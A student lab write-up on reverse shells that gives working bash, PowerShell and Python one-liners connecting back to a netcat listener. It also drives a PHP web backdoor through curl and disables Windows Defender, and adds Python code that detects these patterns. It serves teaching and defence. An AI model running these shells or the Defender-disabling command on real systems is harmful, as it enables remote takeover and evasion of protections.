Lab 8.2 Reverse Shells - FlameSpyro/Tech-Journal GitHub Wiki

Lab 8.2 - Reverse Shells

  • A bash reverse shell needs two terminals: one listening with nc and one on the target that connects back to us. This lab has us test it on our own machine, the Windows 10 machine, and Pippin, while recording our commands in Wireshark.

Linux

  • Open a terminal
ssh [email protected]@10.0.17.200
  • Open a second terminal
ip a
nc -nlvp 4449
  • Window 1
/bin/bash -i >& /dev/tcp/10.0.17.106/4449 0>&1
  • Once fully connected, nc lets us enter any command on the target, such as pwd and whoami.

Pippin

  • This took a few more tries, mostly because my script was wrong at first.
echo '/bin/bash -i >& /dev/tcp/10.0.99.40/4449 0>&1' > eric-script.sh
ftp -i 10.0.5.25 (upload process from before)
exit

curl 'http://10.0.5.25/upload/eric-backdoor.php?cmd=ls%20-l'
curl 'http://10.0.5.25/upload/eric-backdoor.php?cmd=chmod%20777%20eric-script.sh'

PowerShell

  • On the Windows cmd prompt, run this command with the proper listener IP:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.37',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • Oh no! Defender did its job properly! Let's get around that.
  • In an admin PowerShell:
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
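The two commands in this section leave distinctive traces in PowerShell script block logging (event 4104) and in process-creation logs: the TCPClient plus iex pattern of the one-liner, and a Set-MpPreference call that turns protection features off. The following Python is an added defensive example, not part of the original lab, that triages such command lines against those indicators. The indicator names, severities and the sample log lines are constructed for this example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    name: str
    severity: str
    patterns: tuple  # every pattern must match the same command line for the indicator to fire


# Constructed indicator table (assumption: these names and severities are ours, not a vendor's).
INDICATORS = (
    # TCP client object plus Invoke-Expression of received data: the shape of the lab's one-liner.
    Indicator("powershell_tcp_reverse_shell", "high", (
        re.compile(r"Net\.Sockets\.TCPClient", re.I),
        re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    )),
    # Set-MpPreference used to switch a protection feature off, not just to read or schedule settings.
    Indicator("defender_tamper", "high", (
        re.compile(r"\bSet-MpPreference\b", re.I),
        re.compile(r"-Disable\w+\s+\$true"
                   r"|-Enable\w+\s+(Disabled|AuditMode)"
                   r"|-MAPSReporting\s+Disabled"
                   r"|-SubmitSamplesConsent\s+NeverSend", re.I),
    )),
    # Inline or encoded command to powershell.exe: common in admin scripts too, so only low severity.
    Indicator("powershell_inline_command", "low", (
        re.compile(r"\bpowershell(\.exe)?\b.*\s-(c|command|enc|encodedcommand)\b", re.I),
    )),
)

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}


def classify(command: str) -> list[str]:
    """Return the names of every indicator whose patterns all match this command line."""
    return [ind.name for ind in INDICATORS if all(p.search(command) for p in ind.patterns)]


def triage(lines: list[str]) -> list[tuple[int, list[str], str]]:
    """Return (line index, indicator names, highest severity) for each flagged line."""
    hits = []
    for i, line in enumerate(lines):
        names = classify(line)
        if names:
            sev = max((ind.severity for ind in INDICATORS if ind.name in names),
                      key=SEVERITY_RANK.__getitem__)
            hits.append((i, names, sev))
    return hits


# Constructed sample lines, shaped like 4104 script block text and cmd process-creation entries.
SAMPLE_LINES = [
    "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.37',4449); "
    "$stream = $client.GetStream(); $sendback = (iex $data 2>&1 | Out-String)",
    "Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -MAPSReporting Disabled",
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
    "Set-MpPreference -ScanScheduleQuickScanTime 02:00:00",
    'powershell -c "Get-Process | Where-Object CPU -gt 100"',
]

if __name__ == "__main__":
    for idx, names, sev in triage(SAMPLE_LINES):
        print(f"[{sev}] line {idx}: {', '.join(names)}")
```

Reading settings (Get-MpPreference) and changing a scan schedule are deliberately not flagged, so the tamper indicator keys on the parameters that switch protection off rather than on the cmdlet name alone.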

Rerun PowerShell

  • Start nc in the listener window from before.
  • Rerunning the command should now result in a successful connection.

Python Reverse Shell

  • Like before, start an nc listener on Linux.
nc -nlvp 4449
  • Window 2
ssh [email protected]@10.0.17.200
  • Run this Python command:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.106",4449));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
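Both the bash `>& /dev/tcp/... 0>&1` redirection from the Linux section and the `os.dup2` calls in this python3 one-liner leave the shell with stdin, stdout and stderr pointing at a TCP socket instead of a pty, pipe or /dev/null, which is what a host-based check can look for. The Python below is an added defensive example, not part of the lab: it applies that check to a constructed /proc-style snapshot (pids, program names and fd targets are made up for the example) and, when run on a Linux host, to the real /proc tree. The set of watched program names is an assumption.

```python
import os
import re
from pathlib import Path

# Assumption: these programs should normally have a tty, pipe or /dev/null on fds 0-2, never a socket.
INTERACTIVE_PROGRAMS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}

# What readlink on /proc/<pid>/fd/<n> returns for a socket.
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def socket_stdio(comm: str, fds: dict[int, str]) -> frozenset[int]:
    """Return the subset of {0, 1, 2} that points at a socket, for watched programs only."""
    if comm not in INTERACTIVE_PROGRAMS:
        return frozenset()
    return frozenset(fd for fd in (0, 1, 2) if SOCKET_RE.match(fds.get(fd, "")))


def find_suspects(snapshot: dict[int, tuple[str, dict[int, str]]]) -> list[tuple[int, str, list[int]]]:
    """Flag processes whose stdin AND stdout are both sockets: the signature of a socket-attached shell."""
    suspects = []
    for pid in sorted(snapshot):
        comm, fds = snapshot[pid]
        hit = socket_stdio(comm, fds)
        if {0, 1} <= hit:
            suspects.append((pid, comm, sorted(hit)))
    return suspects


def snapshot_procfs(proc: str = "/proc") -> dict[int, tuple[str, dict[int, str]]]:
    """Build the same {pid: (comm, {fd: target})} structure from a live Linux /proc tree."""
    snap = {}
    for entry in os.scandir(proc):
        if not entry.name.isdigit():
            continue
        try:
            comm = Path(entry.path, "comm").read_text().strip()
        except OSError:
            continue  # process exited between scandir and read
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"{entry.path}/fd/{fd}")
            except OSError:
                pass  # closed fd, or another user's process without privileges
        snap[int(entry.name)] = (comm, fds)
    return snap


# Constructed snapshot: what a few processes on the lab hosts would look like.
SAMPLE_SNAPSHOT = {
    1234: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),          # normal ssh session
    2340: ("python3", {0: "socket:[48290]", 1: "socket:[48290]", 2: "socket:[48290]"}),  # after dup2
    2345: ("bash", {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}),     # /dev/tcp redirect
    2346: ("sh", {0: "socket:[48290]", 1: "socket:[48290]", 2: "socket:[48290]"}),       # /bin/sh -i child
    3001: ("nginx", {0: "/dev/null", 1: "pipe:[1000]", 2: "pipe:[1000]"}),           # daemon, not watched
    4000: ("sh", {0: "pipe:[2222]", 1: "pipe:[2222]", 2: "pipe:[2222]"}),           # shell under a web server
}

if __name__ == "__main__":
    source = snapshot_procfs() if os.path.isdir("/proc") else SAMPLE_SNAPSHOT
    for pid, comm, fds in find_suspects(source):
        print(f"pid {pid} ({comm}): stdio fds {fds} are sockets")
```

The shell spawned by the web backdoor (pid 4000) is not flagged because its stdio is a pipe; pairing this check with outbound-connection monitoring on the web server (the Wireshark capture from the lab shows the same connection on the wire) covers that case.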